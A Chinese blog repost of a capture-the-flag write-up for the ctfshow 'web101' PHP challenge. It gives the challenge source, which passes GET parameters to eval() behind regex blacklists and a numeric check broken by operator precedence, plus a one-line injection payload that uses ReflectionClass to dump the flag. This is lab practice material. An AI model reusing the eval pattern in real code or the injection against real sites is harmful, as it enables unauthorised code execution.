首页 > 其他分享 >ctfshow web101(反射类Reflectionclass的使用)

ctfshow web101(反射类Reflectionclass的使用)

时间:2022-10-17 16:22:06浏览次数:59  
标签:反射 Reflectionclass web101 v1 v2 ctfshow 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-22 00:26:48
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

?>

payload如下:

?v1=1&v2=echo new Reflectionclass&v3=;

 

标签:反射,Reflectionclass,web101,v1,v2,ctfshow
From: https://www.cnblogs.com/meng-han/p/16799628.html

相关文章

  • ctfshow web99(in_array函数漏洞)
    <?phphighlight_file(__FILE__);$allow=array();//设置为数组for($i=36;$i<0x36d;$i++){array_push($allow,rand(1,$i));//向数组里面插入随机数}if(isset......
  • ctfshow-crypto
    密码学签到}wohs.ftc{galf是倒叙,将字符串逆序就行crypto2打开浏览器进入查看,复制粘贴到控制台直接回车flag就会出现crypto3同上一样crypto4用py写一个crypto5同上crypto6打......
  • ctfshow文件上传总结
    简单总结下 文件上传前端限制绕过:抓包修改对应项即可,不过本人更习惯上传一个符合要求的文件,然后抓包后只修改后缀名,看看能不能上传成功文件上传后端限制绕过:一般都是检......
  • ctfshow 文件包含总结
    一些php伪协议就不具体介绍了,也不讲太详细filter伪协议可以利用过滤器来读或者写php://filter/read=convert.base64-encode/resource=flag.php  如上图,不能让......
  • ctfshow新手杯剪刀石头布(session反序列化)
    看到ini_set('session.serialize_handler','php');让我不由自主的想起了session反序列化漏洞的一道题。直接百度会有很多文章这里不多介绍。因此我们的解法就是:1.post一......
  • ctfshow新手杯baby_pickle(python序列化与反序列化)
    题目附件代码如下:#Author:#Achilles#Time:#2022-9-20#For:#ctfshowimportbase64importpickle,pickletoolsimportuuidfromflaskimportFlask,......
  • ctfshow新手杯repairman
    首先get传递参数mode=0得到源码Yourmodeistheguest!hello,therepairman!<?phperror_reporting(0);session_start();$config['secret']=Array();include'con......
  • CTFShow 反序列化
    序列化:是将变量转换为可保存或传输的字符串的过程反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。notice:序列化只是将变量序列化。试图通过序......
  • CTFShow 文件包含
    web78目的很明显,需要我们去包含一个文件。<?php/*#-*-coding:utf-8-*-#@Author:h1xa#@Date:2020-09-1610:52:43#@LastModifiedby:h1xa#@LastM......
  • ctfshow 命令执行总结
    做完ctfshowweb29~77、118~124的总结,写的比较简略。PHP中简单的eval函数执行字符限制绕过使用通配符*and??c=system('tacf*');使用`执行命令......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99